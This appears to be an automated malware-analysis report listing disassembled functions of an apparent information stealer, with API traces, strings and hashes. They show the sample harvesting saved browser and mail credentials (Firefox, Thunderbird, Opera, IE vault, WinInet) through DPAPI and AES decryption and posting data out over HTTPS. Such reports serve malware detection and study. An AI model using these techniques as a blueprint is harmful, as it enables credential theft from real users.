RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,00000001,?,?,?,?,?,0048A6F8), ref: 00436639
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043671A
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436739
RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043673E
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436743
RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043675A
RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 00436788
wsprintfW.USER32 ref: 004367B0
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 004367CF
RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043684B
RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,00000001,?,00000001,?,?,?,?,?,0048A6F8), ref: 004369DF
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AC0
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436ADF
RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE4
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE9
RegOpenKeyExW.KERNEL32(80000003,0047D410,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B03
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B13
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00436B3D
RegEnumKeyExW.KERNEL32(?,00000001,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 00436B85
wsprintfW.USER32 ref: 00436BB0
RegOpenKeyExW.KERNEL32(80000003,?,00000000,00020019,?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436BCF
RegEnumKeyExW.KERNEL32(?,00000000,?,283C115D,00000000,00000000,00000000,00000000,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040), ref: 00436C0B
wsprintfW.USER32 ref: 00436C3B
RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012), ref: 00436C5A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012,00000040,00000001), ref: 00436C67
RegQueryValueExA.ADVAPI32(?,tcu/,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,00438A36,00000000), ref: 00436CE4
RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436F90
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043716C

Strings

8, xrefs: 00436309
, xrefs: 0043713B
!eHRQM@Xo@LD, xrefs: 0043682A
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0043635C, 004363E8, 00436750, 0043679F, 00436B98
6`_ECWZ, xrefs: 00436552
|9, xrefs: 004365B7
kKC, xrefs: 0043669E
?, xrefs: 0043637B
/$<8, xrefs: 00436DC5
3, xrefs: 0043696E
3>589}<)g}, xrefs: 00436A15, 00436A49, 00436A9F, 0043666F, 004366A3, 004366F9, 004366AD, 00436A53
%s\%s, xrefs: 004363F3, 004367AA, 00436BAA, 00436C35
k, xrefs: 004370BD
k`x|, xrefs: 00436930

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close$Open$QueryValue$Enumwsprintf$H_prolog$EnvironmentIos_base_dtorVariable_strcatstd::ios_base::_
String ID: $!eHRQM@Xo@LD$%s\%s$/$<8$3$3>589}<)g}$6`_ECWZ$8$?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$k$kKC$k`x|$|9
API String ID: 2335028583-1150690332
Opcode ID: b56f5fbd50b1e30bc38c1691817fd3048f01d031bdf00a7b3de6662fc458ad70
Instruction ID: 91b8013d12c5bab7949268fbb79717665483f54acc398f6523401afbc0a33be3
Opcode Fuzzy Hash: b56f5fbd50b1e30bc38c1691817fd3048f01d031bdf00a7b3de6662fc458ad70
Instruction Fuzzy Hash: 56A2D170D0425D9EDF25CFA4CC81BEEBBB4AF19304F1081AEE449B7242DB744A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00433882, Relevance: 65.3, APIs: 34, Strings: 3, Instructions: 569filestringmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00433887
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00433B2C
CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00433BAB
WriteFile.KERNEL32(00000000,?,00000010,?,00000000), ref: 00433BBE
CloseHandle.KERNEL32(00000000), ref: 00433BC5
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00433BD9
GetFileSize.KERNEL32(00000000,00000000), ref: 00433BE8
GetProcessHeap.KERNEL32(00000000,00000800), ref: 00433BF9
HeapAlloc.KERNEL32(00000000), ref: 00433C00
lstrlenA.KERNEL32 ref: 00433C17
lstrcpynA.KERNEL32(00000000,00000001), ref: 00433C2C
lstrlenA.KERNEL32(?), ref: 00433C39
lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C48
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00433C5F
lstrlenA.KERNEL32(?), ref: 00433C75
lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C88
WinHttpSetOption.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 00433C99
WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 00433CBA
WinHttpSetOption.WINHTTP(00000000,00000005,000F4240,00000004), ref: 00433CC5
WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?), ref: 00433D58

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00800100,?), ref: 00433E48
WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000100,?), ref: 00433EB6
WinHttpSendRequest.WINHTTP(00000000,00000000,000000FF,00000008,?,?,00000000,?), ref: 00433F26
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00433F4E
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00433F64
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00433F99

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpCloseHandle.WINHTTP(00000000), ref: 00434048
WinHttpCloseHandle.WINHTTP(00000000), ref: 00434052
CloseHandle.KERNEL32(?), ref: 0043405B
DeleteFileA.KERNEL32(?), ref: 00434064
WinHttpCloseHandle.WINHTTP(00000000), ref: 0043406B
GetProcessHeap.KERNEL32(00000000,00000010), ref: 00434075
HeapFree.KERNEL32(00000000), ref: 0043407C

Strings

https, xrefs: 00433CEF
%[^:]://%[^/]%[^], xrefs: 00433CDC
POST, xrefs: 00433E42, 00433EB0

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$File$CloseHandle$Heap$OptionRequestlstrcpynlstrlen$ByteCharCreateDataDeleteMultiOpenProcessReadWide$AllocAvailableConnectDeallocateFreeH_prologQueryReceiveResponseSendSizeWrite
String ID: %[^:]://%[^/]%[^]$POST$https
API String ID: 2264578430-666396942
Opcode ID: 35b22b841669ed304232422945110cefd17c6d4b854483351b8d109683202ce8
Instruction ID: 268c877f1b69af4e096e1ece1c9e45decc44a1bdff283dbd08e4261261832945
Opcode Fuzzy Hash: 35b22b841669ed304232422945110cefd17c6d4b854483351b8d109683202ce8
Instruction Fuzzy Hash: BD32BB70E002589FDB21DFA5CD85AEEBBB4BF09304F0041AEE449A7251EB745E85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2F9, Relevance: 58.2, APIs: 28, Strings: 5, Instructions: 434stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0042A341
LoadLibraryA.KERNEL32(?), ref: 0042A395
GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E
GetProcAddress.KERNEL32(00000000,?), ref: 0042A499
GetProcAddress.KERNEL32(00000000,?), ref: 0042A4D5
GetProcAddress.KERNEL32(00000000,?), ref: 0042A50E
lstrlenW.KERNEL32(?), ref: 0042A5D1
lstrcpyW.KERNEL32 ref: 0042A5EC
lstrlenW.KERNEL32(?), ref: 0042A5F9
lstrcpyW.KERNEL32 ref: 0042A618
lstrlenW.KERNEL32(?), ref: 0042A625
lstrcpyW.KERNEL32 ref: 0042A649
lstrlenW.KERNEL32(?), ref: 0042A67D
lstrcpyW.KERNEL32 ref: 0042A69E
StrStrIW.SHLWAPI(?,Internet Explorer), ref: 0042A7B5
lstrlenW.KERNEL32(00000000), ref: 0042A7C0
lstrlenW.KERNEL32(?), ref: 0042A7D0
FreeLibrary.KERNEL32(00000000), ref: 0042A85E

Strings

%, xrefs: 0042A47B
^(?+2*=27p:22, xrefs: 0042A389
vAULTgETiTEM, xrefs: 0042A4C7
RCKU, xrefs: 0042A433
Internet Explorer, xrefs: 0042A7AF

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion
String ID: vAULTgETiTEM$%$Internet Explorer$RCKU$^(?+2*=27p:22
API String ID: 4222390991-95504026
Opcode ID: 9b8114f70002599139ab2fb6433f79d06eaf3614917738f0fca7b371563a96d6
Instruction ID: ee027e3256dc64104db3165579ce757a5594af22ad4575cabb0489d1c635360c
Opcode Fuzzy Hash: 9b8114f70002599139ab2fb6433f79d06eaf3614917738f0fca7b371563a96d6
Instruction Fuzzy Hash: EBF19E71E002689FDF14DFA8DC48BEEBBB8EF49304F10446AE805E7211D7789955CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042E110, Relevance: 55.3, APIs: 11, Strings: 19, Instructions: 2823COMMON

Download Yara Rule

Strings

:, xrefs: 0042F9CD
7, xrefs: 0042F365
Q, xrefs: 00430A01
\, xrefs: 0042E886
H, xrefs: 0042EEF7
h, xrefs: 0042EB3F
}, xrefs: 0042F1CF
N, xrefs: 0042FCEE
,, xrefs: 0042ED26
s, xrefs: 0042E432
Z, xrefs: 00431388
_, xrefs: 004306E4
C, xrefs: 00430075
v, xrefs: 004304EB
f, xrefs: 0042F829
<, xrefs: 00430ED7
/, xrefs: 0042FB5E
V, xrefs: 004301B5
:, xrefs: 0042E112

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: swprintf
String ID: ,$/$7$:$:$<$C$H$N$Q$V$Z$\$_$f$h$s$v$}
API String ID: 233258989-3288149934
Opcode ID: caa3264fb8fe92ec417c61be86101a40b86e4a4e981683b2cc915c0df65cfbe9
Instruction ID: 475275c1d7ed544704e005971488929d6d053b4d6a4e5fceb10a333dc0c0ff90
Opcode Fuzzy Hash: caa3264fb8fe92ec417c61be86101a40b86e4a4e981683b2cc915c0df65cfbe9
Instruction Fuzzy Hash: 97439F34D052A99ACF25F765DC52BEDBBB05F25308F0004DEA65973293DA782B88CF19

Uniqueness

Uniqueness Score: -1.00%

Function 004210B1, Relevance: 50.3, APIs: 7, Strings: 21, Instructions: 1335COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004210B6
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004210EB

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

NSS_Init.NSS3(?,?,?,?,?,?), ref: 0042124D
NSS_Shutdown.NSS3(?,00000001,?,00000001,?,?,?), ref: 004225EB

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

sqlite3_finalize.NSS3(?), ref: 004218A4
sqlite3_close.NSS3(?), ref: 004218B1
__fread_nolock.LIBCMT ref: 00421AB2

Part of subcall function 00427160: __EH_prolog.LIBCMT ref: 00427165

Strings

Profiles, xrefs: 004210FD
1', xrefs: 00422279
Gy_H, xrefs: 0042207E
<4, xrefs: 00421BF8
6rkw, xrefs: 004218F6
c.,9, xrefs: 00421618
*LEX, xrefs: 00422074
&NIURHGKC, xrefs: 00421E26
:,, xrefs: 00422141
ThunderBird, xrefs: 00421B91
*-0, xrefs: 00421648
v, xrefs: 004218FD
nt{w, xrefs: 00421BAD
W9#, xrefs: 00421809
2:, xrefs: 004220EB
>6, xrefs: 004221ED
RD, xrefs: 00421D86
logins, xrefs: 00421B2C, 00421B45
F )4, xrefs: 004222F9
xf, xrefs: 00422094
%, xrefs: 00422564

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate$FolderInitPathShutdown__fread_nolock_strcatsqlite3_closesqlite3_finalize
String ID: %$&NIURHGKC$*-0$*LEX$1'$2:$6rkw$:,$<4$>6$F )4$Gy_H$Profiles$RD$ThunderBird$W9#$c.,9$logins$nt{w$v$xf
API String ID: 1928370683-529884781
Opcode ID: 2faef4cda4b8bfc09e77fcf3831155ce2cd9f6518959895dd6c2fe7d52aa1f83
Instruction ID: 7cf0c16e80d84c1340ed0f8113b1c6eecb7c157959f31b42812db283f23df99d
Opcode Fuzzy Hash: 2faef4cda4b8bfc09e77fcf3831155ce2cd9f6518959895dd6c2fe7d52aa1f83
Instruction Fuzzy Hash: E2D29A70E002A88BCB25DF69D990BEDBBB1AF19304F5041EED409A7252DB785F85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004206DD, Relevance: 40.9, APIs: 15, Strings: 8, Instructions: 607libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004206E2

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000), ref: 004208B8

Part of subcall function 00420568: __EH_prolog.LIBCMT ref: 0042056D

LoadLibraryA.KERNEL32(00000000,?,00000000,00000000), ref: 00420BB1
GetProcAddress.KERNEL32(00000000,orr~hOHU), ref: 00420BFE
GetProcAddress.KERNEL32(00000000,575B5B46), ref: 00420C3E
GetProcAddress.KERNEL32(00000000,?), ref: 00420C7A
GetProcAddress.KERNEL32(00000000,QJ00F[[W), ref: 00420CBB
GetProcAddress.KERNEL32(00000000,?), ref: 00420CEF
GetProcAddress.KERNEL32(00000000,?), ref: 00420D1D
GetProcAddress.KERNEL32(00000000,F[[W[`}|1.;0), ref: 00420D5C
GetProcAddress.KERNEL32(00000000,?), ref: 00420D8C
GetProcAddress.KERNEL32(00000000,44415C5E), ref: 00420DCA
GetProcAddress.KERNEL32(00000000,?), ref: 00420E08
GetProcAddress.KERNEL32(00000000,?), ref: 00420E38
GetProcAddress.KERNEL32(00000000,2A2F3230), ref: 00420E77

Strings

FaOS, xrefs: 00420C52
02/*, xrefs: 00420E44
&, xrefs: 00420E59
/,0, xrefs: 00420E52
yFE^, xrefs: 00420C59
4du`|, xrefs: 00420AE9
QJ00F[[W, xrefs: 00420CB2, 00420CB9
orr~hOHU, xrefs: 00420BF5, 00420BF8

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable_strcat
String ID: /,0$&$02/*$4du`|$FaOS$QJ00F[[W$orr~hOHU$yFE^
API String ID: 1501777685-1778109498
Opcode ID: e1cc69da630ef672405a7b04bd9140e5bba5a8c98b9bbf048e9adcce079a4046
Instruction ID: 3ceee775c1db2101e3abe91b8041793fdedad25dba46125a77d36f99286f4ace
Opcode Fuzzy Hash: e1cc69da630ef672405a7b04bd9140e5bba5a8c98b9bbf048e9adcce079a4046
Instruction Fuzzy Hash: 1132F330E01298CFDB01DBA9D9947EEBBF4AF19304FA4086ED441A7253DB784A85CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E139, Relevance: 30.9, APIs: 13, Strings: 4, Instructions: 1136libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040E13E
GetProcAddress.KERNEL32(?,?), ref: 0040E198
GetProcAddress.KERNEL32(?,?), ref: 0040E1DC
GetProcAddress.KERNEL32(?,?), ref: 0040E22A
GetProcAddress.KERNEL32(?,?), ref: 0040E277
GetProcAddress.KERNEL32(?,?), ref: 0040E2C1
GetProcAddress.KERNEL32(?,?), ref: 0040E30B
GetProcAddress.KERNEL32(?,?), ref: 0040E34E
GetProcAddress.KERNEL32(?,?), ref: 0040E390
wsprintfA.USER32 ref: 0040E409

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 0043584C: __EH_prolog.LIBCMT ref: 00435851

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040ED19
LocalFree.KERNEL32(?,?,?), ref: 0040ED84

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Strings

360Browser, xrefs: 0040E517
S, xrefs: 0040F034
Opera, xrefs: 0040E92D
UCBrowser, xrefs: 0040E500

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$Deallocate$CryptDataFreeLocalUnprotect_free_strcatwsprintf
String ID: 360Browser$Opera$S$UCBrowser
API String ID: 1533498561-2102145511
Opcode ID: 21324d663a36dbae9bbc7ef18ef0c023473a8eeed82dd87374ef18c45a390afb
Instruction ID: b48f6e05fcb707e89987015dea396383d640a2a9a36e0cc3998b43e1c57b30ee
Opcode Fuzzy Hash: 21324d663a36dbae9bbc7ef18ef0c023473a8eeed82dd87374ef18c45a390afb
Instruction Fuzzy Hash: ECB2BA30D00268CBDB21DB65CD94BEEBBB4AF59304F1045EAE409B7292DB745E88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2E6, Relevance: 30.6, APIs: 14, Strings: 3, Instructions: 861libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040F2EB
GetProcAddress.KERNEL32(?,?), ref: 0040F339
GetProcAddress.KERNEL32(?,?), ref: 0040F36B
GetProcAddress.KERNEL32(?,?), ref: 0040F3AA
GetProcAddress.KERNEL32(?,?), ref: 0040F3E2
GetProcAddress.KERNEL32(?,?), ref: 0040F417
GetProcAddress.KERNEL32(?,?), ref: 0040F44C
GetProcAddress.KERNEL32(?,?), ref: 0040F47D
GetProcAddress.KERNEL32(?,?), ref: 0040F4BF
wsprintfA.USER32 ref: 0040F539

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040FBE6
LocalFree.KERNEL32(?,?,?), ref: 0040FC4B
LocalFree.KERNEL32(?), ref: 0040FD1D

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 0040B938: __EH_prolog.LIBCMT ref: 0040B93D
Part of subcall function 0040B938: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040B9A6
Part of subcall function 0040B938: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040B9C4
Part of subcall function 0040B938: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040B9E5
Part of subcall function 0040B938: LocalAlloc.KERNEL32(00000040,?), ref: 0040BA36
Part of subcall function 0040B938: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040BA5E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040FCD3

Strings

360Browser, xrefs: 0040F67D
Opera, xrefs: 0040F88F
UCBrowser, xrefs: 0040F668

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Crypt$Local$DataDeallocateFreeH_prologUnprotect$AlgorithmAllocDecryptGenerateOpenPropertyProviderSymmetricwsprintf
String ID: 360Browser$Opera$UCBrowser
API String ID: 120052701-2459207352
Opcode ID: e0f3e7cc947cdeac60c769e763054a6e407c4e8ca59f21e4ad2ca64ea42f070e
Instruction ID: a9e54f43a0eb16203e17623fa23cba974b08bfcab0be327bc3a9de8742627967
Opcode Fuzzy Hash: e0f3e7cc947cdeac60c769e763054a6e407c4e8ca59f21e4ad2ca64ea42f070e
Instruction Fuzzy Hash: 7572AE30D04258DBDF21DFA4CD91AEEBBB5BF19308F1040AEE409B7292DB745A89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00429F5D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,?,00000000), ref: 00429F82
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000,?,00000000), ref: 00429FA3
lstrlenW.KERNEL32(?,?,00000000), ref: 00429FB2
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00429FC5
CryptGetHashParam.ADVAPI32(00000000,00000002,?,?,00000000,?,00000000), ref: 00429FE8
wsprintfW.USER32 ref: 0042A024
lstrcatW.KERNEL32(00000000,?), ref: 0042A032
wsprintfW.USER32 ref: 0042A052
lstrcatW.KERNEL32(00000000,?), ref: 0042A060
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 0042A069
CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 0042A074
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0042A0BB
CryptUnprotectData.CRYPT32(?,00000000,0042A2AF,00000000,00000000,00000001,?), ref: 0042A0DE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042A117

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0042A08E
%02X, xrefs: 0042A01E, 0042A04C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1004607082-2450551051
Opcode ID: 6439d65f7729c76b50c974d5be1b8a2cdfa08e6978128d092fcff3fe38d753c0
Instruction ID: 005e14ebd307acc44d900abe414c883e19f5054360f72cf190598c62f8d9df29
Opcode Fuzzy Hash: 6439d65f7729c76b50c974d5be1b8a2cdfa08e6978128d092fcff3fe38d753c0
Instruction Fuzzy Hash: 82514171E00219AFDB119FA4EC45FFF77BCAF44304F14402AE905E2151EAB89A15CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040D684, Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 737libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040D689
GetProcAddress.KERNEL32(?,?), ref: 0040D6D4
GetProcAddress.KERNEL32(?,?), ref: 0040D706
GetProcAddress.KERNEL32(?,?), ref: 0040D745
GetProcAddress.KERNEL32(?,?), ref: 0040D77D
GetProcAddress.KERNEL32(?,?), ref: 0040D7B2
GetProcAddress.KERNEL32(?,?), ref: 0040D7E3
GetProcAddress.KERNEL32(?,?), ref: 0040D825
wsprintfA.USER32 ref: 0040D89F

Strings

Opera, xrefs: 0040DB96

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prologwsprintf
String ID: Opera
API String ID: 3606448584-505338728
Opcode ID: b96b1019cded840036f45216f0d6e1e642a7d39cb5f7aa71951840956c144b6e
Instruction ID: 6e7de8c24cde57863cb19fb5fa9ebaa263f0b344b032abc7ce2d8d9550343516
Opcode Fuzzy Hash: b96b1019cded840036f45216f0d6e1e642a7d39cb5f7aa71951840956c144b6e
Instruction Fuzzy Hash: 0962B130D00259CBDF11EFA5CD91AEDBBB4AF19304F1084AEE409B7291DB745A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043E2E4, Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 469COMMON

Download Yara Rule

Strings

UT, xrefs: 0043E5BF
/, xrefs: 0043E37B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 24c08fa2b66218b3b9b6ad1fa51d25a0a079473a53f11dcd4cd7e8150b3a3b0e
Instruction ID: 76826b07e805f1e516683311a4db4d08ba6e9d74c9be735415875e9b36247458
Opcode Fuzzy Hash: 24c08fa2b66218b3b9b6ad1fa51d25a0a079473a53f11dcd4cd7e8150b3a3b0e
Instruction Fuzzy Hash: 8E02B071A093819FD714DF2AD4807ABB7E4BF99304F14182EF98583391D738D859CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A130, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0042A156
lstrlenW.KERNEL32(00000002), ref: 0042A167
CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
LocalFree.KERNEL32(?), ref: 0042A200
CredFree.ADVAPI32(?), ref: 0042A219

Strings

abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 0042A144
J, xrefs: 0042A170
Microsoft_WinInet_*, xrefs: 0042A18B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 186292201-3120203912
Opcode ID: 55992ff89825beb77247bf315440d94e0371b3fb6d0cb9b06891a6d9543f6d9e
Instruction ID: 19e365c0e672387ba2505b807b813ee5e5cbdbe09d4aa82ca4ca5ffd792269d9
Opcode Fuzzy Hash: 55992ff89825beb77247bf315440d94e0371b3fb6d0cb9b06891a6d9543f6d9e
Instruction Fuzzy Hash: 7A315771E00218EBCB20DF95E844DEFBBB8FB84700F50416AE812E3241E7759A11DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF54, Relevance: 15.5, APIs: 10, Instructions: 504libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040CF59
GetProcAddress.KERNEL32(?,?), ref: 0040CFA4
GetProcAddress.KERNEL32(?,?), ref: 0040CFD6
GetProcAddress.KERNEL32(?,?), ref: 0040D015
GetProcAddress.KERNEL32(?,?), ref: 0040D04D
GetProcAddress.KERNEL32(?,?), ref: 0040D082
GetProcAddress.KERNEL32(?,?), ref: 0040D0B3
GetProcAddress.KERNEL32(?,918C8E02), ref: 0040D0F5
wsprintfA.USER32 ref: 0040D159

Memory Dump Source

